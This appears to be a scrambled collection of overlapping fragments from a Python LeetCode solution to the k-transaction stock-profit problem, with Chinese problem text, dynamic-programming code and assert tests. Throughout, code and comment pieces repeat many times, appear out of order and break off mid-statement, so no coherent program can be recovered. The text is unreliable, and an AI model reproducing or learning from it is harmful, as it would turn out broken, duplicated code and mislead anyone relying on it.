这笔交易所能获得利润 = 6-2 = 4 。 # 随后,在第 5", "在第 1 天 (股票价格 = 2) 的时候买入,在第 2 天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润", "dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1 + prices[i]) dp_i_1 = max(dp_i_1, temp - prices[i])", "。 # 示例 2: # 输入: [3,2,6,5,0,3], k = 2 # 输出: 7", "7 # 解释: 在第 2 天 (股票价格 = 2) 的时候买入,在第 3 天 (股票价格", "== 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) ==", "def maxProfit(self, k, prices): nLen = len(prices) if nLen <= 1 or k", "dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k] # 边界", "-sys.maxsize for i in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for i in range(1, nLen+1):", "assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) ==", "### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2,", "3 。 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路 # 复杂度(时间/空间) #", "# 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入: [2,4,1],", "dp_i_k_1 = [] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j]", "for i in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for i in range(1, nLen+1): for", "len(prices) if nLen <= 1 or k == 0: return 0 # k", "0) ## len(prices) >= 4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易", "== 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) ==", "[1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8]) == 7) assert(solution.maxProfit(1, [4,8,1])", "= 3-0 = 3 。 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路", "== 7) ### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6) assert(solution.maxProfit(2,", "solution = Solution() ## len(prices) <= 1 assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1, [1])", "assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(5,", "prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution = Solution() ## len(prices) <= 1 assert(solution.maxProfit(1,", "+ prices[i]) dp_i_1 = max(dp_i_1, temp - prices[i]) return dp_i_0 # k =", "## len(prices) <= 1 assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1, [1]) == 0) ##", "[1,4]) == 3) assert(solution.maxProfit(2, [1,4]) == 3) assert(solution.maxProfit(2, [4,1]) == 0) ## len(prices)", "-*- # __author__ = xiaobao # __date__ = 2019/11/13 12:39:48 # desc: desc", "[4,1,8]) == 7) assert(solution.maxProfit(1, [4,8,1]) == 4) assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1])", "== 3) assert(solution.maxProfit(2, [4,1]) == 0) ## len(prices) = 3 assert(solution.maxProfit(1, [1,4,8]) ==", "int: def maxProfit(self, k, prices): nLen = len(prices) if nLen <= 1 or", "= -sys.maxsize for i in range(1, nLen+1): for j in range(k,0,-1): dp_i_k_0[i][j] =", "5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7) ### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7])", "= [] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] =", "[7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(5, [7,1,5,3,6,4,7])", "你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入: [2,4,1], k = 2 # 输出: 2", "for i in range(nLen): temp = dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1 + prices[i])", "assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3,", "设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入: [2,4,1], k", "# 时间 # 空间 # 代码 import sys class Solution: # def maxProfit(self,", "range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in", "0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5)", "nLen+1): for j in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] =", "return 0 # k = 正无穷 if k >= nLen//2: dp_i_0 = 0", "天 (股票价格 = 2) 的时候买入,在第 2 天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润 = 4-2", "i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: #", "dp_i_0 = 0 dp_i_1 = -sys.maxsize for i in range(nLen): temp = dp_i_0", "### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ###", "Solution: # def maxProfit(self, k: int, prices: List[int]) -> int: def maxProfit(self, k,", "dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1):", "[1,4]) == 3) assert(solution.maxProfit(2, [4,1]) == 0) ## len(prices) = 3 assert(solution.maxProfit(1, [1,4,8])", "coding: utf-8 -*- # __author__ = xiaobao # __date__ = 2019/11/13 12:39:48 #", "[1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8]) == 7) assert(solution.maxProfit(1, [4,8,1]) == 4) assert(solution.maxProfit(1, [8,1,4])", "int, prices: List[int]) -> int: def maxProfit(self, k, prices): nLen = len(prices) if", "0) assert(solution.maxProfit(1, [1]) == 0) ## len(prices) = 2 assert(solution.maxProfit(1, [1,4]) == 3)", "== 0: return 0 # k = 正无穷 if k >= nLen//2: dp_i_0", "- prices[i]) return dp_i_0 # k = 有限次数 dp_i_k_0 = [] for i", "assert(solution.maxProfit(1, [4,8,1]) == 4) assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1]) == 0) ##", "3) assert(solution.maxProfit(1, [8,4,1]) == 0) ## len(prices) >= 4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1])", "= 0 dp_i_1 = -sys.maxsize for i in range(nLen): temp = dp_i_0 dp_i_0", "6 天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润 = 3-0 = 3 。 #", "range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for i", "in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] -", "来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路 # 复杂度(时间/空间) # 时间 # 空间", "[8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1]) == 0) ## len(prices) >= 4 ### 0次交易", "k >= nLen//2: dp_i_0 = 0 dp_i_1 = -sys.maxsize for i in range(nLen):", "dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution = Solution()", "笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入: [2,4,1], k = 2", "天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润 = 4-2 = 2 。 # 示例 2:", "正无穷 if k >= nLen//2: dp_i_0 = 0 dp_i_1 = -sys.maxsize for i", "assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1, [1]) == 0) ## len(prices) = 2 assert(solution.maxProfit(1,", "3) 的时候卖出, 这笔交易所能获得利润 = 3-0 = 3 。 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv #", "== 0) ## len(prices) = 2 assert(solution.maxProfit(1, [1,4]) == 3) assert(solution.maxProfit(2, [1,4]) ==", "复杂度(时间/空间) # 时间 # 空间 # 代码 import sys class Solution: # def", "= 2 # 输出: 2 # 解释: 在第 1 天 (股票价格 = 2)", "2 # 解释: 在第 1 天 (股票价格 = 2) 的时候买入,在第 2 天 (股票价格", "6) 的时候卖出, 这笔交易所能获得利润 = 6-2 = 4 。 # 随后,在第 5 天 (股票价格", "天 (股票价格 = 2) 的时候买入,在第 3 天 (股票价格 = 6) 的时候卖出, 这笔交易所能获得利润 =", "k: int, prices: List[int]) -> int: def maxProfit(self, k, prices): nLen = len(prices)", "这笔交易所能获得利润 = 6-2 = 4 。 # 随后,在第 5 天 (股票价格 = 0)", "7) assert(solution.maxProfit(1, [4,1,8]) == 7) assert(solution.maxProfit(1, [4,8,1]) == 4) assert(solution.maxProfit(1, [8,1,4]) == 3)", "# 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入: [2,4,1], k = 2 #", "k = 2 # 输出: 7 # 解释: 在第 2 天 (股票价格 =", "range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1])", "= 6) 的时候卖出, 这笔交易所能获得利润 = 6-2 = 4 。 # 随后,在第 5 天", "1: # 输入: [2,4,1], k = 2 # 输出: 2 # 解释: 在第", "[8,4,1]) == 0) ## len(prices) >= 4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0)", "== 0) ## len(prices) >= 4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ###", "2 天 (股票价格 = 2) 的时候买入,在第 3 天 (股票价格 = 6) 的时候卖出, 这笔交易所能获得利润", "[2,4,1], k = 2 # 输出: 2 # 解释: 在第 1 天 (股票价格", "# 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 # 思路 # 复杂度(时间/空间) # 时间 #", "## len(prices) >= 4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1,", "assert(solution.maxProfit(1, [8,4,1]) == 0) ## len(prices) >= 4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) ==", "assert(solution.maxProfit(2, [1,4]) == 3) assert(solution.maxProfit(2, [4,1]) == 0) ## len(prices) = 3 assert(solution.maxProfit(1,", "dp_i_0 = max(dp_i_0, dp_i_1 + prices[i]) dp_i_1 = max(dp_i_1, temp - prices[i]) return", "3) assert(solution.maxProfit(2, [1,4]) == 3) assert(solution.maxProfit(2, [4,1]) == 0) ## len(prices) = 3", "1 assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1, [1]) == 0) ## len(prices) = 2", "dp_i_0 # k = 有限次数 dp_i_k_0 = [] for i in range(nLen+1): dp_i_k_0.append([0]*(k+1))", "# __date__ = 2019/11/13 12:39:48 # desc: desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第 i", "max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k] #", "[7,1,5,3,6,4,7]) == 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(4, [7,1,5,3,6,4,7])", "= 6-2 = 4 。 # 随后,在第 5 天 (股票价格 = 0) 的时候买入,在第", "0 # k = 正无穷 if k >= nLen//2: dp_i_0 = 0 dp_i_1", "(股票价格 = 2) 的时候买入,在第 3 天 (股票价格 = 6) 的时候卖出, 这笔交易所能获得利润 = 6-2", "assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7) ### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) ==", "= max(dp_i_0, dp_i_1 + prices[i]) dp_i_1 = max(dp_i_1, temp - prices[i]) return dp_i_0", "[] for i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i in range(nLen+1):", "2019/11/13 12:39:48 # desc: desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成", "nLen//2: dp_i_0 = 0 dp_i_1 = -sys.maxsize for i in range(nLen): temp =", "4) 的时候卖出,这笔交易所能获得利润 = 4-2 = 2 。 # 示例 2: # 输入: [3,2,6,5,0,3],", "[7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7])", "Solution() ## len(prices) <= 1 assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1, [1]) == 0)", "# 输入: [3,2,6,5,0,3], k = 2 # 输出: 7 # 解释: 在第 2", "prices[i]) return dp_i_0 # k = 有限次数 dp_i_k_0 = [] for i in", "i 个元素是一支给定的股票在第 i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例", "[3,2,6,5,0,3], k = 2 # 输出: 7 # 解释: 在第 2 天 (股票价格", "assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1]) == 0) ## len(prices) >= 4 ###", "6-2 = 4 。 # 随后,在第 5 天 (股票价格 = 0) 的时候买入,在第 6", "desc: desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 #", "assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7) ### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) ==", "temp = dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1 + prices[i]) dp_i_1 = max(dp_i_1, temp", "的时候卖出, 这笔交易所能获得利润 = 3-0 = 3 。 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。", "2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7) ### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7])", "dp_i_1 + prices[i]) dp_i_1 = max(dp_i_1, temp - prices[i]) return dp_i_0 # k", "range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i in range(nLen+1):", "3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8)", "= 正无穷 if k >= nLen//2: dp_i_0 = 0 dp_i_1 = -sys.maxsize for", "# 示例 1: # 输入: [2,4,1], k = 2 # 输出: 2 #", "# k = 正无穷 if k >= nLen//2: dp_i_0 = 0 dp_i_1 =", "随后,在第 5 天 (股票价格 = 0) 的时候买入,在第 6 天 (股票价格 = 3) 的时候卖出,", "return dp_i_k_0[nLen][k] # 边界 solution = Solution() ## len(prices) <= 1 assert(solution.maxProfit(1, [])", "assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(4,", "解释: 在第 2 天 (股票价格 = 2) 的时候买入,在第 3 天 (股票价格 = 6)", "0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ### 2次交易", "0) ## len(prices) = 2 assert(solution.maxProfit(1, [1,4]) == 3) assert(solution.maxProfit(2, [1,4]) == 3)", "[7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4])", "的时候买入,在第 3 天 (股票价格 = 6) 的时候卖出, 这笔交易所能获得利润 = 6-2 = 4 。", "输出: 2 # 解释: 在第 1 天 (股票价格 = 2) 的时候买入,在第 2 天", "时间 # 空间 # 代码 import sys class Solution: # def maxProfit(self, k:", "= 2 # 输出: 7 # 解释: 在第 2 天 (股票价格 = 2)", "dp_i_k_0 = [] for i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i", "= 2019/11/13 12:39:48 # desc: desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。 #", "utf-8 -*- # __author__ = xiaobao # __date__ = 2019/11/13 12:39:48 # desc:", "2 天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润 = 4-2 = 2 。 # 示例", "= max(dp_i_1, temp - prices[i]) return dp_i_0 # k = 有限次数 dp_i_k_0 =", "= -sys.maxsize for i in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for i in range(1,", "or k == 0: return 0 # k = 正无穷 if k >=", "range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for i in range(1, nLen+1): for j in range(k,0,-1):", "== 7) assert(solution.maxProfit(1, [4,1,8]) == 7) assert(solution.maxProfit(1, [4,8,1]) == 4) assert(solution.maxProfit(1, [8,1,4]) ==", "[1]) == 0) ## len(prices) = 2 assert(solution.maxProfit(1, [1,4]) == 3) assert(solution.maxProfit(2, [1,4])", "输入: [2,4,1], k = 2 # 输出: 2 # 解释: 在第 1 天", "# 随后,在第 5 天 (股票价格 = 0) 的时候买入,在第 6 天 (股票价格 = 3)", "dp_i_k_1[0][j] = -sys.maxsize for i in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for i in", "assert(solution.maxProfit(1, [4,1,8]) == 7) assert(solution.maxProfit(1, [4,8,1]) == 4) assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1,", "2 。 # 示例 2: # 输入: [3,2,6,5,0,3], k = 2 # 输出:", "k = 正无穷 if k >= nLen//2: dp_i_0 = 0 dp_i_1 = -sys.maxsize", "assert(solution.maxProfit(1, [1]) == 0) ## len(prices) = 2 assert(solution.maxProfit(1, [1,4]) == 3) assert(solution.maxProfit(2,", "= max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution = Solution() ##", "range(nLen): temp = dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1 + prices[i]) dp_i_1 = max(dp_i_1,", "7) ### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7])", "k = 2 # 输出: 2 # 解释: 在第 1 天 (股票价格 =", "1 天 (股票价格 = 2) 的时候买入,在第 2 天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润 =", "[7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7) ### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0)", "nLen = len(prices) if nLen <= 1 or k == 0: return 0", "给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 #", "i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for", "= 2) 的时候买入,在第 2 天 (股票价格 = 4) 的时候卖出,这笔交易所能获得利润 = 4-2 = 2", "+ prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution", "的时候买入,在第 6 天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润 = 3-0 = 3 。", "def maxProfit(self, k: int, prices: List[int]) -> int: def maxProfit(self, k, prices): nLen", "7) assert(solution.maxProfit(1, [4,8,1]) == 4) assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1]) == 0)", "2: # 输入: [3,2,6,5,0,3], k = 2 # 输出: 7 # 解释: 在第", "= max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k]", "assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ### 2次交易 assert(solution.maxProfit(1,", "in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j", "== 6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) ==", "== 4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7) ###", "的时候卖出,这笔交易所能获得利润 = 4-2 = 2 。 # 示例 2: # 输入: [3,2,6,5,0,3], k", "__date__ = 2019/11/13 12:39:48 # desc: desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第 i 天的价格。", "in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for i in range(1, nLen+1): for j in", "代码 import sys class Solution: # def maxProfit(self, k: int, prices: List[int]) ->", "3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8]) == 7)", "4) assert(solution.maxProfit(1, [8,1,4]) == 3) assert(solution.maxProfit(1, [8,4,1]) == 0) ## len(prices) >= 4", "k == 0: return 0 # k = 正无穷 if k >= nLen//2:", "= 4 。 # 随后,在第 5 天 (股票价格 = 0) 的时候买入,在第 6 天", "0: return 0 # k = 正无穷 if k >= nLen//2: dp_i_0 =", "# 解释: 在第 2 天 (股票价格 = 2) 的时候买入,在第 3 天 (股票价格 =", "max(dp_i_1, temp - prices[i]) return dp_i_0 # k = 有限次数 dp_i_k_0 = []", "in range(nLen): temp = dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1 + prices[i]) dp_i_1 =", "6) assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8) assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10) assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) == 10)", ">= nLen//2: dp_i_0 = 0 dp_i_1 = -sys.maxsize for i in range(nLen): temp", "## len(prices) = 2 assert(solution.maxProfit(1, [1,4]) == 3) assert(solution.maxProfit(2, [1,4]) == 3) assert(solution.maxProfit(2,", "1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4) ### 2次交易 assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5) assert(solution.maxProfit(2, [7,1,5,3,6,4])", "i in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for i in range(1, nLen+1): for j", "# def maxProfit(self, k: int, prices: List[int]) -> int: def maxProfit(self, k, prices):", ">= 4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) ==", "if nLen <= 1 or k == 0: return 0 # k =", "空间 # 代码 import sys class Solution: # def maxProfit(self, k: int, prices:", "k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入: [2,4,1], k =", "in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i in range(nLen+1): dp_i_k_1[i][0] = -sys.maxsize for", "prices: List[int]) -> int: def maxProfit(self, k, prices): nLen = len(prices) if nLen", "[] for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize", "dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i in range(nLen+1): dp_i_k_1[i][0]", "注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入: [2,4,1], k = 2 # 输出:", "for j in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j],", "= 2 。 # 示例 2: # 输入: [3,2,6,5,0,3], k = 2 #", "。 # 随后,在第 5 天 (股票价格 = 0) 的时候买入,在第 6 天 (股票价格 =", "# 代码 import sys class Solution: # def maxProfit(self, k: int, prices: List[int])", "prices[i]) dp_i_1 = max(dp_i_1, temp - prices[i]) return dp_i_0 # k = 有限次数", "# 思路 # 复杂度(时间/空间) # 时间 # 空间 # 代码 import sys class", "= -sys.maxsize for i in range(nLen): temp = dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1", "有限次数 dp_i_k_0 = [] for i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for", "for i in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for", "j in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1]", "in range(nLen+1): dp_i_k_1.append([0]*(k+1)) for j in range(k+1): dp_i_k_1[0][j] = -sys.maxsize for i in", "max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution = Solution() ## len(prices)", "[7,1,5,3,6,4]) == 7) ### 3次交易 assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0) assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6)", "= [] for i in range(nLen+1): dp_i_k_0.append([0]*(k+1)) dp_i_k_1 = [] for i in", "4-2 = 2 。 # 示例 2: # 输入: [3,2,6,5,0,3], k = 2", "[]) == 0) assert(solution.maxProfit(1, [1]) == 0) ## len(prices) = 2 assert(solution.maxProfit(1, [1,4])", "assert(solution.maxProfit(2, [4,1]) == 0) ## len(prices) = 3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1,", "i in range(nLen): temp = dp_i_0 dp_i_0 = max(dp_i_0, dp_i_1 + prices[i]) dp_i_1", "在第 2 天 (股票价格 = 2) 的时候买入,在第 3 天 (股票价格 = 6) 的时候卖出,", "天的价格。 # 设计一个算法来计算你所能获取的最大利润。你最多可以完成 k 笔交易。 # 注意: 你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 # 示例 1: # 输入:", "nLen <= 1 or k == 0: return 0 # k = 正无穷", "# 边界 solution = Solution() ## len(prices) <= 1 assert(solution.maxProfit(1, []) == 0)", "dp_i_k_0[nLen][k] # 边界 solution = Solution() ## len(prices) <= 1 assert(solution.maxProfit(1, []) ==", "(股票价格 = 0) 的时候买入,在第 6 天 (股票价格 = 3) 